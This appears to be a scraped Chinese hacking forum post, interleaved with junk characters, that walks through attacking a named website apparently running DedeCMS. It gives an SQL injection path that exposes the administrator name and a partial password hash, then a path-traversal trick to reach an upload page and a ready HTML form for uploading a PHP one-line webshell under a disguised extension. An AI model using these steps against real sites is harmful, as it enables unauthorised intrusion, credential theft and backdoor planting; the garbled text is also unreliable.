①注入漏洞。
5 V6 \1 D* z9 I# Q这站 http://www.political-security.com/
) Q3 U, b; x. _1 j6 N' E9 _首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
4 D9 Y r! j P7 f* kwww.political-security.com/data/mysql_error_trace.inc 爆后台$ i R: k! m8 S7 ~0 n1 B
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
6 n. |3 a$ a. b7 G然后写上语句 0 x, s7 r( W; x! O% ?: ?
查看管理员帐号+ D/ ~5 P p: a9 V3 E# f1 g0 C9 o
http://www.political-security.co ... &membergroup=@`
/ \7 z# R+ _8 [- W7 V/ q& K3 K' M1 Z) _$ {) y/ J& F8 `
admin
A6 I; ]- V/ a- | b: w, [
2 M: s& G2 ~6 @* k: v查看管理员密码
* W6 c0 T) H. s http://www.political-security.co ... &membergroup=@`) \+ P6 K5 v! ^
, v3 _" Q* h# h4 g( I$ }
8d29b1ef9f8c5a5af429
4 D/ w0 Y8 s- j# u& P, i0 l6 h1 f" Z! L! S+ ?
查看管理员密码
8 W! I6 x3 J; I! L( Y" S3 _8 `: r2 y* R; v7 H6 w9 }( W: u9 g
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
! q) Z# m. z* N$ t* e; F3 W( q9 q& _/ s
8d2( X# Q1 ^( _1 Z1 L _2 s
9b1ef9f8c5a5af42( r! l0 @& @7 |; C- r5 o
9% g4 c4 D `( p: Q2 Z7 J
6 z2 |6 m3 v$ ^( F2 ~2 M* Mcmd5没解出来 只好测试第二个方法. e. ~' S# v8 k6 d
4 _4 Y* v* @. ~# g; z4 l- r) e* u% U! T* G
②上传漏洞:, K) E( f% I) Z& o- D0 S
8 F2 z, V8 V" Z/ Z* d" e只要登陆会员中心,然后访问页面链接
( s% `1 O' c6 u; Q% L7 ~5 U- s {“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
8 o: ]1 ?3 u b% E& G
7 M7 c6 {( W7 _3 H+ y5 y% g如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
1 f" T% Q! m- {% g
5 ]. O6 k' l+ W于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm8 o2 `8 S: W) Z7 B4 v2 \
: o0 e/ u$ m! z% U9 L' [<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>" ?# D5 S9 W4 D* f9 h+ a0 q( m1 Q
或者
& ]+ U# E- q7 F& {- x3 W$ v/ D即可上传成功 |